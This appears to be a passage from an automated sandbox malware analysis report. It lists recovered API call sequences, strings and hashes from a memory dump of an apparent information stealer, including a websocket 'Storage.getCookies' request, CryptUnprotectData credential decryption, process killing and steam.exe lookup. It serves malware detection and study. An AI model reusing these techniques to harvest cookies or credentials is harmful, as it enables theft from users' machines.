                              • API ID: lstrcat$Desktoplstrcpy$CloseCreateFolderPathSleeplstrcpynlstrlenwsprintf
                              • String ID: %s%s$D
                              • API String ID: 649207557-433275411
                              • Opcode ID: 0c273119e8071dc55cb3585616c6c640e2940b0f60f1312722668465cf40274b
                              • Instruction ID: e7bb251d7fcec3f80ddff047c6ee9d30dc0d648f118b0362d4f375490f1e47a8
                              • Opcode Fuzzy Hash: 0c273119e8071dc55cb3585616c6c640e2940b0f60f1312722668465cf40274b
                              • Instruction Fuzzy Hash: B9616F71214345AFD760EF64DC49FAF7BE8FF88700F00891DB6898B191DB74A9448BA6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_
                              • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$hU\$hU\$ws://${"id":1,"method":"Storage.getCookies"}
                              • API String ID: 909987262-1727676772
                              • Opcode ID: 13f1c3418a3bd9d55fd7863956cddf81e00047daf53e283fc87b10fa9e472489
                              • Instruction ID: f955e725e68b5955e919eadff38e3340aff1008e9be7e54c1f110a0131834032
                              • Opcode Fuzzy Hash: 13f1c3418a3bd9d55fd7863956cddf81e00047daf53e283fc87b10fa9e472489
                              • Instruction Fuzzy Hash: 55A25A71D012599FDF24DFA8C8807EDBBB6BF88300F1481AAD509A7241EB716E85CF91
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A2774
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A2797
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A27A2
                              • lstrlen.KERNEL32(\*.*), ref: 005A27AD
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A27CA
                              • lstrcat.KERNEL32(00000000,\*.*), ref: 005A27D6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A280A
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 005A2826
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                              • String ID: \*.*
                              • API String ID: 2567437900-1173974218
                              • Opcode ID: 192668339bbee4bf184f22fd339f0906bd27184d793ae2d48ef6e92e841c3426
                              • Instruction ID: df390f9afa16d8a5feeed2c7f976187a49d9e82a88e8c7a8ba7c8d019c89bb50
                              • Opcode Fuzzy Hash: 192668339bbee4bf184f22fd339f0906bd27184d793ae2d48ef6e92e841c3426
                              • Instruction Fuzzy Hash: 93411F3151261BABCF21EF68DC8EA9E7FA4FF85710F044128B94997262DB34DD458B90
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005B46D9
                              • Process32First.KERNEL32(00000000,00000128), ref: 005B46E9
                              • Process32Next.KERNEL32(00000000,00000128), ref: 005B46FB
                              • StrCmpCA.SHLWAPI(?), ref: 005B470D
                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 005B4722
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 005B4731
                              • CloseHandle.KERNEL32(00000000), ref: 005B4738
                              • Process32Next.KERNEL32(00000000,00000128), ref: 005B4746
                              • CloseHandle.KERNEL32(00000000), ref: 005B4751
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                              • String ID:
                              • API String ID: 3836391474-0
                              • Opcode ID: e378098eb625613d40e11efb6c35f6054e460c3eb8510b0805730a1f9903d351
                              • Instruction ID: 3ba004dded0ae5cd895291129f6b44859e6c4f009dcfcc66fb49153ab79c7fac
                              • Opcode Fuzzy Hash: e378098eb625613d40e11efb6c35f6054e460c3eb8510b0805730a1f9903d351
                              • Instruction Fuzzy Hash: 6701AD32601125ABE7605B209C8CFFA3B7CFB49B01F00408CFA0595180EF78A982CBA9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: Buu$Tt:{$a"aZ$q|]U$?o$D>}$]=$m{$]
                              • API String ID: 0-1268567615
                              • Opcode ID: 856b03ada0cd90a315cc298685a696a879fd469b8e6db539013337118a1c8547
                              • Instruction ID: 3941f02b4b9600b532b53ea8e6fc4a465495a50271d2c685963826eee0ef81ae
                              • Opcode Fuzzy Hash: 856b03ada0cd90a315cc298685a696a879fd469b8e6db539013337118a1c8547
                              • Instruction Fuzzy Hash: 5DB22AF360C2049FE3046E2DEC8567AFBE9EBD4720F16463DEAC5C3744EA3558058696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: >.w$FDi$\]Z$c&#p$e}uv$t\$x;k5$[Q$[Q
                              • API String ID: 0-3298746570
                              • Opcode ID: d9ef96fb744abed5f9d0323d1f9c80b499d37c88b255becbeb7da8b73cc8e9e9
                              • Instruction ID: 47e3ad24069e2d972808f6fa9904f899a6ec60c5531b049d47697799a27d0627
                              • Opcode Fuzzy Hash: d9ef96fb744abed5f9d0323d1f9c80b499d37c88b255becbeb7da8b73cc8e9e9
                              • Instruction Fuzzy Hash: A2B22AF360C2049FE304AE2DEC8567AB7E9EF94720F1A853DE6C4C7744EA3598058697
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 005B4648
                              • Process32First.KERNEL32(00000000,00000128), ref: 005B4658
                              • Process32Next.KERNEL32(00000000,00000128), ref: 005B466A
                              • StrCmpCA.SHLWAPI(?,steam.exe), ref: 005B4680
                              • Process32Next.KERNEL32(00000000,00000128), ref: 005B4692
                              • CloseHandle.KERNEL32(00000000), ref: 005B469D
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Similarity
                              • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                              • String ID: steam.exe
                              • API String ID: 2284531361-2826358650
                              APIs
                                • Part of subcall function 005B7210: lstrcpy.KERNEL32(00000000,ERROR), ref: 005B722E
                              • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 005B2D3B
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 005B2D4D
                              • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 005B2D5A
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 005B2D8C
                              • LocalFree.KERNEL32(00000000), ref: 005B2F6A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: %>vA$@0}$D&;o$N0y?$R,M=$SK7$\N
                              • API String ID: 0-2710613983
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: cc~$c~u$c~u${W'f$~1ko$m[~
                              • API String ID: 0-651459261
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: 3=$8F#&$pXml$v*m5$&o6$8{
                              • API String ID: 0-4209079957
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 005B2BE2
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005B2BE9
                              • GetTimeZoneInformation.KERNEL32(?), ref: 005B2BF8
                              • wsprintfA.USER32 ref: 005B2C23
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID: wwww
                              • API String ID: 3317088062-671953474
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: =C}F$G_=_$g~}k$nrNz$v|?
                              • API String ID: 0-2657977514
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: ;mw$>R!o$?-$yPW$;w
                              • API String ID: 0-2594508399
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0059769E
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005976A5
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 005976CD
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 005976ED
                              • LocalFree.KERNEL32(?), ref: 005976F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              APIs
                                • Part of subcall function 005B7210: lstrcpy.KERNEL32(00000000,ERROR), ref: 005B722E
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005B3A36
                              • Process32First.KERNEL32(00000000,00000128), ref: 005B3A49
                              • Process32Next.KERNEL32(00000000,00000128), ref: 005B3A5F
                                • Part of subcall function 005B7340: lstrlen.KERNEL32(------,00595B1B), ref: 005B734B
                                • Part of subcall function 005B7340: lstrcpy.KERNEL32(00000000), ref: 005B736F
                                • Part of subcall function 005B7340: lstrcat.KERNEL32(?,------), ref: 005B7379
                                • Part of subcall function 005B72B0: lstrcpy.KERNEL32(00000000), ref: 005B72DE
                              • CloseHandle.KERNEL32(00000000), ref: 005B3B97
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0059EDD6
                              • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0059EDDE
                              • lstrcat.KERNEL32(005BD014,005BD014), ref: 0059EE87
                              • lstrcat.KERNEL32(005BD014,005BD014), ref: 0059EEA9
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              APIs
                              • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 005B40AD
                              • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 005B40BC
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005B40C3
                              • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 005B40F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Similarity
                              • API ID: BinaryCryptHeapString$AllocateProcess
                              • String ID:
                              • API String ID: 3825993179-0
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,00000000,005BA400,000000FF), ref: 005B2B2F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005B2B36
                              • GetLocalTime.KERNEL32(?), ref: 005B2B42
                              • wsprintfA.USER32 ref: 005B2B6E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              APIs
                              • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00599B9B
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00599BAA
                              • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00599BC1
                              • LocalFree.KERNEL32 ref: 00599BD0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Similarity
                              • API ID:
                              • String ID: &}{7$cb~u$m.
                              • API String ID: 0-552598620
                              APIs
                              • CoCreateInstance.COMBASE(005BB140,00000000,00000001,005BB130,?), ref: 005ACC06
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 005ACC46
                              • lstrcpyn.KERNEL32(?,?,00000104), ref: 005ACCC9
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                              • String ID:
                              • API String ID: 1940255200-0
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00599BFF
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00599C13
                              • LocalFree.KERNEL32(?), ref: 00599C37
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Similarity
                              • API ID:
                              • String ID: O"}^$r!g
                              • API String ID: 0-1740976610
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: InfoSystemwsprintf
                              • String ID:
                              • API String ID: 2452939696-0
                              • Opcode ID: 12d2eed1e8978dd2ddf1143d45cc8c33dd1a54843f353b4a5a82f00de93aae9e
                              • Instruction ID: 47716ed5af2aa57553c892620decd402dd32f0796b79f506343d285902784dc9
                              • Opcode Fuzzy Hash: 12d2eed1e8978dd2ddf1143d45cc8c33dd1a54843f353b4a5a82f00de93aae9e
                              • Instruction Fuzzy Hash: ACF090B1940208AFCB10CF84EC85FDAFB7DFB48A20F40866EE90592280D7782944CAE5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: =vgy
                              • API String ID: 0-1880940410
                              • Opcode ID: 01235e5a9275b817919772c71eeb8180e98a2e677f41effcd8e39843c0a77568
                              • Instruction ID: f7068a293dbb6c455a7ed9be0203589b872f10388572b0dc4aa6c67443c69866
                              • Opcode Fuzzy Hash: 01235e5a9275b817919772c71eeb8180e98a2e677f41effcd8e39843c0a77568
                              • Instruction Fuzzy Hash: 215125F3A086045BE748AE2EDC8573BFBE6EBD4710F1A893DD7C583380D93858058686
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: Zrj~
                              • API String ID: 0-4197340146
                              • Opcode ID: 76d6a4bc13d9eaf845a31ab2181398569097259e5ab6c3cd7085c6c2425082be
                              • Instruction ID: 9dbb1168f1ee5d49d33aa9f855bcd098b384e5273b8ab7f7d39650a8e2d990e1
                              • Opcode Fuzzy Hash: 76d6a4bc13d9eaf845a31ab2181398569097259e5ab6c3cd7085c6c2425082be
                              • Instruction Fuzzy Hash: 6F510BB3A082045FE314AE3EDC8572BFBE7EBD4310F16863DE6D883744E93569068656
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: qmC
                              • API String ID: 0-4005487783
                              • Opcode ID: 2c29fc39c8fdd05c0dba8904b60cd3387a222bc337759aef1a5bc5220b198b8f
                              • Instruction ID: c6ccb59665bc5312164397fe55ac3c6c7dbcb7fb3cb98227ef21b8ce6add0ddf
                              • Opcode Fuzzy Hash: 2c29fc39c8fdd05c0dba8904b60cd3387a222bc337759aef1a5bc5220b198b8f
                              • Instruction Fuzzy Hash: 01416BF7B082105FF3109D2DECC5BBB77E9DB94320F198639EA84D3744E97A98058296
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9c2c3880f3fb3e5adc4dcc60f177d30f1a3aefb9642eaec78d7502dc76749087
                              • Instruction ID: df788bf0888f2d75c582eca5e192d53c8fa92c16023419de74f761b259259624
                              • Opcode Fuzzy Hash: 9c2c3880f3fb3e5adc4dcc60f177d30f1a3aefb9642eaec78d7502dc76749087
                              • Instruction Fuzzy Hash: C2513DF3A483089BE3009E6DECC0766F7DAEF94614F6A813CDA84D3744F57A69058297
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
